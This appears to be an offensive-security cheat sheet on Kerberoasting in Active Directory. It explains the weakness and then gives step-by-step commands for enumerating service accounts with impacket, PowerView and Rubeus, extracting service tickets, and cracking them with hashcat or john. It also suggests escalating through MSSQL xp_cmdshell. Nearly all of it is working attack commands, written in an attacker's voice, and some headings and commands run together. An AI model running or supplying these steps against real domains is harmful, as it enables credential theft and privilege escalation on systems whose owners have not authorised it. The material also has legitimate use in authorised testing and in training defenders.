Kerberoasting
ABOUT
Kerberoasting is a lateral movement/privilege escalation technique in Active Directory environments. This attack targets Service Principal Name (SPN) accounts.
Domain accounts are often used to run services to overcome the network authentication limitations of built-in accounts such as NT AUTHORITY\LOCAL SERVICE.
Any domain user can request a Kerberos ticket for any service account in the same domain.
It works because in Kerberos protocol if you have TGT, KDC implies you are honest domain member, so it can give you ST (which is encrypted with Service Account's password). But then if you would try to access service, Service will check UAC and ACL, and deny you're access. The vulnerability is that any user can ask for TGS, and because of it we can.
Look for juicy Kerberoastable account with SPN's to use.
Extract TGS Tickets.
Crack it and get a creds (You can't use hash for PtH, only crack it).
This is also possible across forest trusts if authentication is permitted across the trust boundary.
If the password for a domain SQL Server service account is cracked, you are likely to find yourself as a local admin on multiple servers, if not Domain Admin. Even if cracking a ticket obtained via a Kerberoasting attack gives a low-privilege user account, we can use it to craft service tickets for the service specified in the SPN. For example, if the SPN is set to MSSQL/SRV01, we can access the MSSQL service as sysadmin, enable the xp_cmdshell extended procedure and gain code execution on the target SQL server.
Prerequisites
We could execute Kerberoasting from various setups like (shell / creds are must-have):
Non-domain Linux machine (Impacket, netexec, hashcat, john, etc).
Non-domain Windows machine (using runas /netonly).
Domain-joined Windows machine (PowerView, Rubeus, Mimikatz, setspn.exe, etc)
LINUX
GetUserSPNs
Use
-outputfileparameter for output into a file
List SPN Accounts
impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reedRequest all TGS Tickets
impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reed -requestTarget Specific User
impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reed -request-user songbirdWith
-target-domainparameter we can do Cross-Forest Kerberoasting
WINDOWS
PowerView
Extract TGS Tickets
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountnameTarget Specific User
PS C:\> Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format HashcatExtract all Tickets to CSV
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\crack_tgs.csv -NoTypeInformationRubeus
Stats
PS C:\> .\Rubeus.exe kerberoast /statsTarget High-Value Accounts
PS C:\> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrapTarget Specific User
PS C:\> .\Rubeus.exe kerberoast /user:testuser /nowrap # For RC4 only, use /tgtdelegWith
-Domainparameter we can do Cross-Forest Kerberoasting
CRACKING
IF YOU ARE ON WINDOWS SERVER 2016 OR EARLIER SPECIFY HASH IN RC4 ALGORITHM BECAUSE IT'S EASIER TO CRACK. IF YOU ARE ABOVE 2016's THEN YOU WILL BE DEALING WITH AES ENCRYPTION.
IF HASH BEGINS WITH
$krb5tgs$23$*THIS IS RC4 HASH
Checking Supported Encryption Types
PS C:\> Get-DomainUser testuser -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypesHashcat
1. Convert kirbi to Crackable format
python2.7 kirbi2john.py sqldev.kirbi > crack_tgs_unprocessed2. Modifying file for Hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_tgs_unprocessed > crack_tgs3. Run Hashcat
hashcat -m 13100 crack_tgs /usr/share/wordlists/rockyou.txt # 13100 mode is for RC4John
1. Convert kirbi to Crackable format
python2.7 kirbi2john.py sqldev.kirbi > crack_tgs2. Run John
john --wordlist=/usr/share/wordlists/rockyou.txt crack_tgs
